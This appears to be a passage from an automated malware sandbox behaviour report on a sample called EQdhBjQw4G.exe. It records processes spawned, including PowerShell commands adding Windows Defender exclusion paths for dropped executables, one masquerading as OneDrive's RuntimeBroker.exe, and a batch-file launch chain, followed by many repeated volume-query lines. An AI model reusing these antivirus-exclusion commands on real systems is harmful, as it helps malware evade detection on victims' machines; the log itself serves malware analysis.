                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeQueries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
